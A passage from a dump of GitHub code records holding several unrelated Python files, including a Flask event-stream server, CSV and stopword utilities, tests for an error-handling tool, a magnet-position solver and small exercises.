self.emit_single_user(data, queue)\n \n '''\n add user to channels\n '''\n self.users_by_channel['broadcast'].append(subscriber)\n self.users_by_channel[channel].append(subscriber)\n\n return self.generate_emittor(queue)\n \n def generate_emittor(self,queue):\n '''\n generates events until END_STREAM is received\n '''\n while True:\n data = queue.get()\n if data is 
EventPublisher.END_STREAM:\n return\n yield data\n\n def close(self):\n '''\n closes all connections\n '''\n for channel in self.users_by_channel.values():\n for queue, _ in channel:\n queue.put(EventPublisher.END_STREAM)\n channel.clear()\n\n\nif __name__ == '__main__':\n event_publisher = EventPublisher()\n consumer = EventsConsumer(event_publisher)\n consumer.start()\n\n @app.route('/', methods=['GET'])\n def home():\n return flask.send_from_directory('./', 'index.html')\n \n @app.route('/subscribe', methods=['GET'])\n @cross_origin(origin='*')\n def subscribe():\n username = flask.request.args.get('username')\n channel = flask.request.args.get('channel')\n return flask.Response(event_publisher.join_channel(properties=username, channel=channel),\n content_type='text/event-stream')\n\n\n app.run(host=\"localhost\", port=5002, debug=True)","repo_name":"Hyperkid123/server-push-poc","sub_path":"sse-service/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70005540589","text":"import csv\r\n\r\nwith open(\"test_list.csv\") as csv_file:\r\n reader = csv.DictReader(csv_file)\r\n\r\n external_media = []\r\n archives_processing = []\r\n\r\n for row in reader:\r\n external_media.append(row['B'])\r\n # iterates through values in column labeled B in csv and appends each to external_media list\r\n archives_processing.append(row['D'])\r\n # iterates through values in column labeled D in csv and appends each to archives_processing list\r\n\r\n missing_files = [x for x in external_media if x not in archives_processing]\r\n # print(missing_files) will print values in shell\r\n \r\n with open('missing_files_list.csv', 'a', newline='') as output_csv:\r\n writer = csv.writer(output_csv, delimiter=',')\r\n for file in missing_files:\r\n writer.writerow([file])\r\n","repo_name":"alejandradean/digital_archiving","sub_path":"match_list_to_csv.py","file_name":"match_list_to_csv.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"41895497275","text":"import setuptools\n\nname = 'travel assistant'\nversion = '1.0'\n\nsetuptools.setup(\n author='x73495, Moreez317, senzaw',\n command_options={\n 'build_sphinx': {\n 'project': ('setup.py', name),\n 'version': ('setup.py', version),\n }\n },\n description='Travel assistant between Russia and Germany',\n name=name,\n package_dir={\"\": \"src\"},\n packages=setuptools.find_packages(where=\"src\"),\n python_requires='>=3.7',\n url='https://github.com/x73495/travel-assistant',\n version=version\n)\n","repo_name":"73495/mirea-s4-trpp","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28774121190","text":"#import subprocess as sub\nimport os \nimport functions as fun \nimport sys\n\n#This file is used to create all the options and parameters\n#that the program will have \n\n#It is divided into 2 conditionals\n#if there are 4 arguments, counting the script name, and\n#if there are 3 arguments, counting the script name\n#-s --save and -r --repo <-- to save the program \n#-d --del and -r --repo <-- to delete it \n#to list the saved programs only 3 parameters are used,\n#specifying the origin of the program: whether it comes from the repositories or from snap packages. 
\n\n\n#Keeping the options in a list means writing less code\narguments = [ [\"-s\",\"--save\"], [\"-d\", \"--del\"], [\"-r\",\"--repo\"],[\"-l\", \"--list\" ] ]\n\n#we need the absolute path of the file so the script can be used from anywhere in\n#the terminal, i.e. add the project file as an environment variable so we are allowed to use it \nfilePath = \"/home/linux/terminal_project/repo_programs.txt\"\n\n\n\nif len(sys.argv) == 4: #number of terminal arguments\n op1 = sys.argv[1] #option\n op2 = sys.argv[2] #option\n pr = sys.argv[3] #program (these conditions are for when the programs come from the repositories)\n\n\n if (op1 in arguments[0]) and (op2 in arguments[2]): #add a program to the selected list-------\n if not fun.is_installed(pr):\n print(\"The program is not installed.\")\n exit() \n elif fun.in_the_file(filePath, pr):\n print(\"The program is in the file.\")\n exit()\n else:\n #if none of the previous conditions is met, the program will be saved\n fun.add_to_file(filePath, pr, True)\n print(\"The program is saved.\") \n exit()\n elif (op1 in arguments[1]) and (op2 in arguments[2]): #delete a program from the list---------\n if (not fun.in_the_file(filePath, pr) ):\n print(\"The program you want to remove is not in the file.\")\n exit()\n else:\n fun.del_from_file(filePath, pr) \n print(\"The program is removed from your list.\")\n exit()\n exit\n\nelif len(sys.argv) == 3: \n op1 = sys.argv[1] #Option\n pr = sys.argv[2] #name of the origin of the program\n \n if (op1 in arguments[3]) and (pr == \"repo\"): #list the programs in the specified archive--------\n fun.list_programms(filePath)\n exit() \n else:\n print(\"Error: unrecognized parameters.\") \n\nelse:\n print(\"-Error: incorrect parameters.\") \n exit() \n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"DanielIsaias/savepro","sub_path":"savepro.py","file_name":"savepro.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71856026668","text":"from climate_type import ClimateData\nfrom season_data import SEASON_AUTUMN, SEASON_WINTER, SEASON_SPRING, SEASON_SUMMER, SEASON_CONSTANT\n\nCLIMATE_TEMPERATE_KEY = \"temperate\"\nCLIMATE_TEMPERATE = ClimateData(\n name=CLIMATE_TEMPERATE_KEY,\n description=\"Temperate climates are found in the middle latitudes, between the polar and tropical regions. These climates have four seasons, with warm summers and cold winters.\",\n seasons=[SEASON_SPRING, SEASON_AUTUMN, SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=-5,\n maximum_temperature=80)\n\nCLIMATE_DESERT_KEY = \"desert\"\nCLIMATE_DESERT = ClimateData(\n name=CLIMATE_DESERT_KEY,\n description=\"Desert climates are found in hot, arid regions. These climates have two seasons, with hot summers and warm winters.\",\n seasons=[SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=-10,\n maximum_temperature=130)\n\nCLIMATE_TROPICAL_KEY = \"tropical\"\nCLIMATE_TROPICAL = ClimateData(\n name=CLIMATE_TROPICAL_KEY,\n description=\"Tropical climates are found in the tropical regions. These climates have two seasons, with hot summers and wet winters.\",\n seasons=[SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=60,\n maximum_temperature=110)\n\nCLIMATE_ALPINE_KEY = \"alpine\"\nCLIMATE_ALPINE = ClimateData(\n name=CLIMATE_ALPINE_KEY,\n description=\"Alpine climates are found in high mountain regions. 
These climates have two seasons, with warm summers and cold winters.\",\n seasons=[SEASON_SPRING, SEASON_AUTUMN, SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=-10,\n maximum_temperature=70)\n\nCLIMATE_POLAR_KEY = \"polar\"\nCLIMATE_POLAR = ClimateData(\n name=CLIMATE_POLAR_KEY,\n description=\"Polar climates are found in the polar regions. These climates have two seasons, with cold summers and even colder winters.\",\n seasons=[SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=-40,\n maximum_temperature=30)\n\nCLIMATE_TUNDRA_KEY = 'tundra'\nCLIMATE_TUNDRA = ClimateData(\n name=CLIMATE_TUNDRA_KEY,\n description=\"Tundra climates are found in the polar regions. These climates have two seasons, with cool summers and cold winters.\",\n seasons=[SEASON_SUMMER, SEASON_WINTER],\n minimum_temperature=-30,\n maximum_temperature=50)\n\nCLIMATE_SUBTERRANEAN_KEY = \"subterranean\"\nCLIMATE_SUBTERRANEAN = ClimateData(\n name=CLIMATE_SUBTERRANEAN_KEY,\n description=\"Subterranean climates are found in the polar regions. There are generally no seasons, with a constant temperature.\",\n seasons=[SEASON_CONSTANT],\n minimum_temperature=30,\n maximum_temperature=70)\n\nCLIMATES_DB = [CLIMATE_TEMPERATE, CLIMATE_DESERT, CLIMATE_TROPICAL, CLIMATE_ALPINE, CLIMATE_POLAR, CLIMATE_SUBTERRANEAN, CLIMATE_TUNDRA]\n","repo_name":"JustinLloyd/banderschnappen","sub_path":"climate_data.py","file_name":"climate_data.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"784106297","text":"import os\nimport shutil\nimport sys\n\nimport yaml\n\nfrom lsst.cm.tools.core import panda_utils\nfrom lsst.cm.tools.core.handler import Handler\nfrom lsst.cm.tools.core.utils import LevelEnum, StatusEnum\nfrom lsst.cm.tools.db.sqlalch_interface import SQLAlchemyInterface\n\n\ndef test_error_handling() -> None:\n try:\n os.unlink(\"test_error_handling.db\")\n except OSError: # pragma: no cover\n pass\n os.system(\"\\\\rm -rf archive_test\")\n\n iface = SQLAlchemyInterface(\"sqlite:///test_error_handling.db\", echo=False, create=True)\n Handler.plugin_dir = \"examples/handlers/\"\n Handler.config_dir = \"examples/configs/\"\n os.environ[\"CM_CONFIGS\"] = Handler.config_dir\n\n iface.load_error_types(\"examples/configs/error_code_decisions.yaml\")\n\n assert iface.match_error_type(\"taskbuffer, 102\", \"expired in pending. status unchanged\") is not None\n\n iface.modify_error_type(\"expired_in_pending\", diagnostic_message=\"expired in pending. status peachy\")\n\n assert iface.match_error_type(\"taskbuffer, 102\", \"expired in pending. status unchanged\") is None\n\n assert iface.match_error_type(\"taskbuffer, 102\", \"expired in pending. 
status peachy\") is not None\n\n\ndef test_error_matching() -> None:\n try:\n os.unlink(\"test_error.db\")\n except OSError: # pragma: no cover\n pass\n shutil.rmtree(\"archive_requeue\", ignore_errors=True)\n\n iface = SQLAlchemyInterface(\"sqlite:///test_error.db\", echo=False, create=True)\n Handler.plugin_dir = \"examples/handlers/\"\n Handler.config_dir = \"examples/configs/\"\n os.environ[\"CM_CONFIGS\"] = Handler.config_dir\n\n config_name = \"test_errors\"\n config_yaml = \"example_config.yaml\"\n\n top_db_id = None\n iface.insert(top_db_id, None, None, production_name=\"example\")\n db_p_id = iface.get_db_id(production_name=\"example\")\n config = iface.parse_config(config_name, config_yaml)\n\n iface.insert(\n db_p_id,\n \"campaign\",\n config,\n production_name=\"example\",\n campaign_name=\"test\",\n butler_repo=\"repo\",\n lsst_version=\"dummy\",\n prod_base_url=\"archive_errors\",\n )\n\n db_c_id = iface.get_db_id(production_name=\"example\", campaign_name=\"test\")\n\n step_name = \"step1\"\n db_s_id = iface.get_db_id(production_name=\"example\", campaign_name=\"test\", step_name=step_name)\n iface.queue_jobs(LevelEnum.campaign, db_c_id)\n iface.launch_jobs(LevelEnum.campaign, db_c_id, 100)\n db_g_id = iface.get_db_id(\n production_name=\"example\",\n campaign_name=\"test\",\n step_name=step_name,\n group_name=\"group_4\",\n )\n db_w_id = iface.get_db_id(\n production_name=\"example\",\n campaign_name=\"test\",\n step_name=step_name,\n group_name=\"group_4\",\n workflow_idx=0,\n )\n iface.fake_run(LevelEnum.group, db_g_id, StatusEnum.reviewable)\n iface.fake_run(LevelEnum.step, db_s_id)\n iface.set_job_status(LevelEnum.step, db_w_id, \"job\", 0, StatusEnum.failed)\n\n with open(\"examples/errors.yaml\", \"r\") as error_file:\n errors_aggregate = yaml.safe_load(error_file)\n\n iface.commit_errors(5, errors_aggregate)\n panda_utils.print_errors_aggregate(sys.stdout, errors_aggregate)\n\n status_list = [\"done\", \"done\", \"finished\", \"finished\"]\n max_pct_failed = {152029: 0.001, 152185: 0.001}\n status = panda_utils.decide_panda_status(iface, status_list, errors_aggregate, max_pct_failed)\n assert status\n\n iface.load_error_types(\"examples/configs/error_code_decisions.yaml\")\n iface.rematch_errors()\n iface.report_errors(sys.stdout, LevelEnum.step, db_s_id)\n iface.report_error_trend(sys.stdout, \"kron_kron\")\n\n\nif __name__ == \"__main__\":\n test_error_matching()\n","repo_name":"lsst-dm/cm_tools","sub_path":"tests/test_error_handling.py","file_name":"test_error_handling.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31311611581","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom lmfit import Parameters, minimize, report_fit, Minimizer\nimport time\nimport scipy\n\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\nu0 = 4 * np.pi * 1e-7 # const permeability of vacuum\n\n\ndef VecM(params, j): # calculate vector Mj\n theta, phy, M = params['theta{}'.format(\n j)], params['phy{}'.format(j)], params['m{}'.format(j)]\n # convert the M, theta and phy to its limited range\n theta = np.pi * sigmoid(theta)\n # theta = np.pi*np.tanh(theta)\n phy = np.pi * np.tanh(phy)\n M = np.exp(M)\n return 1e-7 * M * np.array([np.sin(theta) * np.cos(phy),\n np.sin(theta) * np.sin(phy),\n np.cos(theta)])\n\n\ndef VecB(params, pSensor, i=0, j=0): # calculate Bij\n x, y, z = params['X{}'.format(j)], params['Y{}'.format(\n j)], params['Z{}'.format(j)]\n # the position 
of the sensor i\n xs, ys, zs = pSensor[i, 0], pSensor[i, 1], pSensor[i, 2]\n vecR = np.stack([xs - x, ys - y, zs - z]).reshape(3, 1)\n vecM = VecM(params, j).reshape(3, 1)\n dis = np.linalg.norm(vecR, 2)\n vecb = 3 * np.matmul(vecR, (np.matmul(vecM.T, vecR))) / \\\n np.power(dis, 5) - vecM / np.power(dis, 3)\n return vecb\n\n# Calculate the residual of x, y, z\n\n\ndef objective(params, data, pSensor, mag_count):\n \"\"\"Calculate total residual for fits of Gaussians to several data sets.\"\"\"\n ndata, _ = data.shape\n resid = np.zeros_like(data)\n # make residual per data set\n\n for i in range(ndata):\n G = np.array([params['gx'], params['gy'], params['gz']]).reshape(3, 1)\n M = G\n for j in range(mag_count):\n tmp = VecB(params, pSensor, i, j)\n M += tmp\n resid[i] = data[i] - M.flatten() * 1e6\n # now flatten this to a 1D array, as minimize() needs\n tmp = resid.flatten()\n # tmp = np.sum(np.power(tmp, 2))\n return tmp\n\n\nclass Solver:\n def __init__(self, mag_count=1, p1=-0.04, p2=0.04, p3=0.04):\n self.fit_params = Parameters()\n self.mag_count = mag_count\n self.fit_params.add('gx', value=0)\n self.fit_params.add('gy', value=0)\n self.fit_params.add('gz', value=0)\n for i in range(mag_count):\n self.fit_params.add('X{}'.format(i), value=p1)\n self.fit_params.add('Y{}'.format(i), value=p2)\n self.fit_params.add('Z{}'.format(i), value=p3)\n self.fit_params.add('m{}'.format(i), value=np.log(2), vary=True)\n self.fit_params.add('theta{}'.format(i), value=0.2)\n self.fit_params.add('phy{}'.format(i), value=0)\n\n def solve(self, data, pSensor, builtin=False):\n if builtin:\n data = np.array([\n [-102.15, 12.01, -135.52],\n [-324.49, 78.12, -377.52],\n [-727.09, 84.12, -406.56],\n [-390.59, 660.99, 174.24]\n ])\n data = np.concatenate([data, data, data], axis=0)\n # Sensor position\n pSensor = 1e-2 * np.array([\n [0, -4.4, 0],\n [0, 0, 0],\n [0, 4.4, 0],\n [-4.5, 0, 0]\n ])\n pSensor = np.concatenate([pSensor, pSensor, pSensor], axis=0)\n\n t0 = time.time()\n out = minimize(objective, self.fit_params,\n args=(data, pSensor, self.mag_count), method='leastsq')\n # out = Minimizer.leastsq(objective, self.fit_params,\n # args=(data, pSensor))\n # self.fit_params['X'] = out.params['X']\n # self.fit_params['Y'] = out.params['Y']\n # self.fit_params['Z'] = out.params['Z']\n self.fit_params = out.params\n # self.fit_params['theta'].value = np.random.randn()\n # self.fit_params['phy'].value = np.random.randn()\n print(time.time() - t0)\n # report_fit(out.params)\n return out.params\n\n\nif __name__ == \"__main__\":\n tmp = Solver()\n data = np.array([\n [78.11, -210.31, 24.20],\n [351.52, -423.63, -183.92],\n [859.29, -120.18, -706.64],\n [-93.14, -688.03, -445.28]\n ])\n pSensor = 1e-2 * np.array([\n [0, -4.4, 0],\n [0, 0, 0],\n [0, 4.4, 0],\n [-4.5, 0, 0]\n ])\n out = tmp.solve(data, pSensor, False)\n report_fit(out)\n","repo_name":"dychen24/magx","sub_path":"Codes/optimization/src/solver/Senor1Mag4.py","file_name":"Senor1Mag4.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"44988639505","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\n\nimport erppeek\nimport dbconfig\n\nimport time\nfrom yamlns import namespace as ns\nimport sys\nfrom consolemsg import step, error, warn, success\n\n\nnregistres = sys.argv[1] if len(sys.argv)>1 else 100\n\n\nstep(\"Connectant a {server}\",**dbconfig.erppeek)\nt0 = time.time()\nerp = erppeek.Client(**dbconfig.erppeek)\n\nsuccess(\"Establir 
connexió: {}\", time.time()-t0)\n\nt0 = time.time()\n\nusers = erp.ResPartner.read(range(100),[])\n\nsuccess(\"Llegir {} Partners {}\",nregistres, time.time()-t0)\n\nt0 = time.time()\ncontracts = erp.GiscedataPolissa.read(range(100),[])\nsuccess(\"Llegir {} Contractes {}\",nregistres, time.time()-t0)\n\nt0 = time.time()\naccountML = erp.AccountMoveLine.read(range(50),[])\nsuccess(\"Llegir {} Account Move Line {}\",nregistres, time.time()-t0)\n\n\n\n#vim: ts=4 sw=4 noet\n","repo_name":"Som-Energia/somenergia-scripts","sub_path":"benchmarks/user_browse.py","file_name":"user_browse.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30892770573","text":"from pathlib import Path\n\n\nclass Config:\n def __init__(self):\n self.weights_path = './data/final.h5'\n self.train_path = './data/garden_stuff/train'\n self.test_path = './data/garden_stuff/test'\n self.seed = 228\n self.epochs = 300\n self.img_width = 64\n self.img_height = 64\n self.batch_size = 32\n self.samples_per_epoch = 512\n self.validation_steps = 512 / self.batch_size\n self.filters1 = 128\n self.filters2 = 256\n self.filters3 = 512\n self.filters4 = 256\n self.dense_size1 = 384\n self.dense_size2 = 256\n self.dense_size3 = 128\n self.conv_size1 = 4\n self.conv_size2 = 6\n self.conv_size3 = 8\n self.conv_size4 = 4\n self.pool_size = 2\n self.alternative_pool_size = 2\n self.classes_num = 74\n self.lr = 0.001\n self.lr_decay = 0.01\n self.leaky_rely_alpha = 0.001\n self.prediction_steps = 12000\n self.dropout_rate = 0.0\n","repo_name":"d768/ClassyBanana","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18949813423","text":"import json\nimport os\nfrom util.XMLParser import extract_word_from_xml\nimport jieba\nfrom classification.Preprocessor import Preprocessor\n\n\ndef doc_word_seg():\n \"\"\"\n load docs, and then do word segmentation.\n :return: list of tuple, (id, segment_word_list)\n \"\"\"\n ws_ms_category_file_path = \"../data/ws_ms_category.json\"\n doc_word_seg_file_path = \"../data/doc_word_seg.json\"\n word_segment_file_root = \"../data/output\"\n\n if os.path.exists(doc_word_seg_file_path):\n print(\"Pre segmented files found, loading...\")\n doc_word_list_ = json.load(open(doc_word_seg_file_path, \"r\"))\n print(\"Loading finished!\")\n else:\n print(\"Extracting basic info from files...\")\n sample_list = json.load(open(ws_ms_category_file_path, \"r\"))\n\n print(\"Segmenting words...\")\n doc_word_list_ = []\n for sample in sample_list:\n content = load_word_segment(\"%s/%s.xml\" % (word_segment_file_root, sample[\"ID\"]))\n word_segment = extract_word_from_xml(content)\n\n if len(word_segment) == 0:\n word_segment = []\n seg_list = jieba.cut(sample[\"BASIC_INFO\"])\n for seg in seg_list:\n word_segment.append(seg)\n\n doc_word_list_.append((sample[\"ID\"], word_segment))\n\n json.dump(doc_word_list_, open(doc_word_seg_file_path, \"w\"))\n print(\"Loading finished!\")\n return doc_word_list_\n\n\ndef load_word_segment(file_path):\n if os.path.exists(file_path):\n with open(file_path, \"r\", encoding=\"utf-8\") as file:\n content = file.read()\n file.close()\n return content\n return \"\"\n\n\ndef duplicate_words_removal(doc_word_list_):\n print(\"Starting duplicate words removal...\")\n unique_doc_word_seg_file_path = \"../data/unique_doc_word_seg.json\"\n if 
os.path.exists(unique_doc_word_seg_file_path):\n unique_doc_word_list_ = json.load(open(unique_doc_word_seg_file_path, \"r\"))\n else:\n unique_doc_word_list_ = []\n for _id, word_list_ in doc_word_list_:\n unique_word_list = get_word_set(word_list_)\n unique_doc_word_list_.append((_id, unique_word_list))\n json.dump(unique_doc_word_list_, open(unique_doc_word_seg_file_path, \"w\"))\n\n print(\"Duplicate words removal finished!\")\n return unique_doc_word_list_\n\n\ndef symbols_removal(doc_word_list_):\n \"\"\"\n remove symbols and numeric strings in doc_word_list\n :param doc_word_list_:\n :return:\n \"\"\"\n doc_word_seg_symbols_removal_file_path = \"../data/doc_word_seg_symbols_removal.json\"\n print(\"Removing symbols and numeric strings from files...\")\n if os.path.exists(doc_word_seg_symbols_removal_file_path):\n new_doc_word_list_ = json.load(open(doc_word_seg_symbols_removal_file_path))\n else:\n stopwords_symbols_file_path = \"../stopwords_symbols.txt\"\n symbols = [line.decode(\"utf-8\").strip() for line in open(stopwords_symbols_file_path, \"rb\").readlines()]\n\n new_doc_word_list_ = []\n for _id, word_list_ in doc_word_list_:\n new_word_list_ = []\n for word_ in word_list_:\n if word_ not in symbols and not str(word_).isnumeric():\n new_word_list_.append(word_)\n new_doc_word_list_.append((_id, new_word_list_))\n\n json.dump(new_doc_word_list_, open(doc_word_seg_symbols_removal_file_path, \"w\"))\n print(\"Symbols removal finished!\")\n return new_doc_word_list_\n\n\ndef calc_df(doc_word_list_):\n print(\"Calculating document frequency...\")\n\n df_file_path = \"../data/document_frequency.json\"\n if os.path.exists(df_file_path):\n word_frequency_sorted_ = json.load(open(df_file_path))\n else:\n # TODO trunk doc_word_list\n # TODO invoke multi-thread to handle each trunk\n # TODO Join result\n word_frequency_ = calc_trunk_df(doc_word_list_, 1)\n\n word_frequency_sorted_ = sort_frequency(word_frequency_)\n json.dump(word_frequency_sorted_, open(df_file_path, \"w\"))\n print(\"Calculation finished!\")\n return word_frequency_sorted_\n\n\ndef sort_frequency(word_frequency_):\n print(\"Sorting frequency...\")\n frequency_sorted_ = sorted(word_frequency_, key=lambda key: key[1], reverse=True)\n print(\"Sorting frequency finished!\")\n return frequency_sorted_\n\n\ndef calc_trunk_df(doc_word_list_trunk, trunk_index):\n print(\"Calculating document frequency of trunk %s\" % trunk_index)\n\n trunk_temp_file_path = \"../data/trunk/%s.json\" % trunk_index\n\n word_frequency_ = {}\n for _, word_list_ in doc_word_list_trunk:\n for word in word_list_:\n if word in word_frequency_.keys():\n word_frequency_[word] += 1\n else:\n word_frequency_[word] = 1\n\n word_frequency_list = list(word_frequency_.items())\n json.dump(word_frequency_list, open(trunk_temp_file_path, \"w\"))\n print(\"Calculating document frequency of trunk %s finished\" % trunk_index)\n return word_frequency_list\n\n\ndef get_word_set(word_list):\n word_set = []\n for word in word_list:\n word = str(word).lstrip()\n if word not in word_set and len(word) > 0:\n word_set.append(word)\n return word_set\n\n\ndef filter_stopwords():\n preprocessor = Preprocessor()\n new_lines = []\n with open(\"../words_frequency.txt\", \"r\", encoding=\"utf-8\") as file:\n lines = file.readlines()\n for line in lines:\n str_list = line.split(\",\")\n word = str_list[0]\n count = str_list[1]\n\n word = preprocessor.process_word(word)\n if len(word) > 1:\n new_lines.append((word, count))\n file.close()\n with open(\"../words_frequency2.txt\", 
\"w\", encoding=\"utf-8\") as file:\n for line in new_lines:\n file.write(\"%s,%s\" % (line[0], line[1]))\n file.close()\n\n\nif __name__ == \"__main__\":\n # doc_word_list = doc_word_seg()\n # doc_word_list = symbols_removal(doc_word_list)\n # doc_word_list = duplicate_words_removal(doc_word_list)\n # word_frequency = calc_df(doc_word_list)\n #\n # with open(\"../words_frequency.txt\", \"w\", encoding=\"utf-8\") as file:\n # for wf in word_frequency:\n # file.write(\"%s,%s\" % (wf[0], wf[1]))\n # file.write(\"\\n\")\n # file.close()\n\n filter_stopwords()\n","repo_name":"leimiaomiao/TextMining","sub_path":"MachineLearning/stopwords/StopwordsGenerator.py","file_name":"StopwordsGenerator.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71454861869","text":"from kivymd.uix.dialog import ListMDDialog\n\n\"\"\"\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.label import Label\npopup = Popup(title='Test popup', content=Label(text='Hello world'), size_hint=(None, None), size=(400, 400))\n\"\"\"\n\nclass LocationPopupMenu(ListMDDialog):\n\n def __init__(self, location_data):\n super().__init__()\n # Info from csv file\n headers= \"Lieu;X;Y;Description;Payant\"\n headers= headers.split(';')\n print(location_data)\n for i in range(len(headers)):\n attribute_name = headers[i]\n attribute_value = location_data[i]\n setattr(self, attribute_name, attribute_value)\n","repo_name":"thibaultmey/Project_10","sub_path":"Program/locationpopupmenu.py","file_name":"locationpopupmenu.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42683589272","text":"import random\nnumeri=[0]*20\nfor i in range(0,20):\n numeri[i]=random.randint(1,10)\nprint(numeri)\npari=0\ndispari=0\nfor i in range(0,len(numeri)):\n if numeri[i]%2==0:\n pari+=numeri[i]\n else:\n dispari+=numeri[i]\nprint(\"somma pari:\",pari)\nprint(\"somma dispari:\",dispari)\n ","repo_name":"MarcoInc/Python_Exercises","sub_path":"Esercizi/Sommatoria pari e dispari array.py","file_name":"Sommatoria pari e dispari array.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38923606864","text":"import pandas as pd\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n# Citirea datelor de antrenare și test\r\ntrain_data = pd.read_csv('train.csv')\r\ntest_data = pd.read_csv('test.csv')\r\n\r\n# Separarea caracteristicilor și a variabilei țintă din datele de antrenare\r\ntrain_x = train_data.drop(columns=['Id', 'Open Date', 'City', 'City Group', 'Type', 'revenue'])\r\ntrain_y = train_data['revenue']\r\n\r\n# Inițializarea și antrenarea modelului de regresie liniară\r\nregressor = LinearRegression()\r\nregressor.fit(train_x, train_y)\r\n\r\n# Realizarea predicțiilor pe datele de test\r\ntest_x = test_data.drop(columns=['Id', 'Open Date', 'City', 'City Group', 'Type'])\r\npredictions = regressor.predict(test_x)\r\n\r\n# Calcularea erorii medii pătratice (MSE) pe datele de antrenare\r\ntrain_predictions = regressor.predict(train_x)\r\ntrain_mse = mean_squared_error(train_y, train_predictions)\r\nprint(\"Mean Squared Error (Train):\", train_mse)\r\n\r\n# Salvarea rezultatelor în fișierul 'sampleSubmission.csv'\r\nsubmission = pd.DataFrame({'Id': test_data['Id'], 'Prediction': 
predictions})\r\nsubmission.to_csv('sampleSubmission2.csv', index=False)\r\n","repo_name":"Daiana200/proiectlp3","sub_path":"ML.py","file_name":"ML.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72429404586","text":"#!/usr/bin/python3\n\nimport argparse\nfrom pathlib import Path\nimport re\n\n\nclass Get_iperf_sum:\n\n def __init__(self, file_path) -> None:\n self.file = Path(file_path)\n\n def get_sum(self):\n # print(self.file)\n with open(self.file) as f:\n lines = f.readlines()\n # print(lines)\n\n sums = (line for line in lines if line[0:5] == '[SUM]')\n # print(list(sums))\n\n # [SUM] 0.00-1.00 sec 76.3 MBytes 640 Mbits/sec 0.090 ms 1786/58153 (3.1%)\n mbps_pattern = re.compile(r'(\\d*.?\\d*) Mbits/sec')\n\n counter = 0\n total = 0.0\n for each in sums:\n try:\n mbps = float(mbps_pattern.search(each).group(1))\n counter += 1\n total += mbps\n print(f'{counter}: {mbps} Mbps')\n except Exception as e:\n pass\n\n print(f'\\nTotal count: {counter}, AVG: {total/counter:.2f} Mbps\\n')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--file_path', required=True,\n type=str, help='iperf txt file to calculate sum.')\n args = parser.parse_args()\n\n worker = Get_iperf_sum(args.file_path)\n\n worker.get_sum()\n","repo_name":"balao1312/mydropbox","sub_path":"get_iperf_sum.py","file_name":"get_iperf_sum.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23661125214","text":"\"\"\"bj_1932\n\nhttps://www.acmicpc.net/problem/1932\n\"\"\"\ndef get_summary(datas):\n summary = [datas.pop(0)]\n for idx1, data in enumerate(datas):\n tmp = []\n for idx2, d in enumerate(data):\n _max = max([summary[idx1][max([0, idx2-1])],\n summary[idx1][min([idx1, idx2])]])\n tmp.append(_max + d)\n summary.append(tmp)\n return summary[-1]\n\nif __name__ == '__main__':\n HEIGHT = int(input())\n TRIANGLE = list()\n for step in range(HEIGHT):\n _input = input().split(\" \")\n TRIANGLE.append(list(map(int, _input)))\n print(max(get_summary(TRIANGLE)))\n","repo_name":"LazyerIJ/Algorithm","sub_path":"Problem/BakJoon/bj_1932.py","file_name":"bj_1932.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30454120347","text":"import pygame\nimport sys\nimport math\n\n\nfrom tictactoe_client import TicTacToeClient\nfrom tictactoe_ai import TicTacToeAI\n\n\nSCREEN_SIZE = SCREEN_WIDTH, SCREEN_HEIGHT = 600, 600\nCELL_SIZE = CELL_WIDTH, CELL_HEIGHT = int(SCREEN_WIDTH/3), int(SCREEN_HEIGHT/3)\nMARK_SIZE = MARK_WIDTH, MARK_HEIGHT = int(CELL_WIDTH*0.8), 